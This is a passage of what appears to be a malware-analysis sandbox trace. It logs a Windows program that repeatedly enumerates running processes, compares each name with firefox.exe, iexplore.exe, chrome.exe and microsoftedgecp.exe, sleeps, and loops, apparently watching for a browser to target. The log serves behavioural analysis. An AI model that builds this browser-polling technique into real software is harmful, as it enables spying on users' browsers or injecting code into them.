lpString2="iexplore.exe") returned 1 [0246.270] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0246.270] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0246.270] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0246.270] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0246.270] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0246.270] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0246.271] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0246.271] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0246.271] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0246.271] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0246.271] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0246.271] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0246.271] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0246.271] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0246.272] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0246.272] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0246.272] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0246.272] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0246.272] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0246.273] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0246.273] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0246.273] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0246.273] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0246.273] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0246.273] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0246.273] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0246.274] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0246.274] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0246.274] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0246.274] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.274] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0246.274] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0246.274] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0246.274] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.275] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.275] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.275] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.275] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0246.275] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0246.275] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0246.275] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0246.275] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.276] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.276] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.276] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.276] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.276] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0246.276] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0246.276] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0246.276] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0246.277] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.277] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.277] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.277] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.277] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0246.278] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0246.278] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0246.278] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0246.278] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.278] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.278] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0246.278] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0246.278] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0246.278] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.278] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.279] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.280] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0246.280] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.280] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0246.281] CloseHandle (hObject=0xd4) returned 1 [0246.281] Sleep (dwMilliseconds=0x3e8) [0247.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0247.288] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.289] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0247.289] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0247.289] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0247.289] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0247.289] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.289] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0247.289] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0247.289] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0247.289] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0247.289] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.290] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0247.290] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0247.290] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0247.290] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.290] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.290] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0247.290] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0247.290] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0247.290] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.291] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.291] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0247.291] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0247.291] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0247.291] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.291] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.292] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0247.292] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0247.292] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0247.292] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.292] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.292] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0247.292] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0247.292] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0247.292] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.292] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.293] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0247.293] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0247.293] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0247.293] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.293] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.293] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0247.293] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0247.293] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0247.293] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.293] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0247.294] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0247.294] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0247.294] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0247.294] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.294] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.295] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.295] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.295] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.296] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.296] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.296] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.296] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.296] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.297] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.297] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.297] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.298] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0247.298] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0247.298] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0247.298] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.298] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.298] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.298] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.298] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.298] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.298] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.299] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.299] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.299] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.299] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.299] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.299] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0247.299] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0247.299] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0247.299] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.299] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.313] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0247.313] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0247.313] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0247.313] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.313] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0247.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0247.313] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0247.314] lstrcmpiA 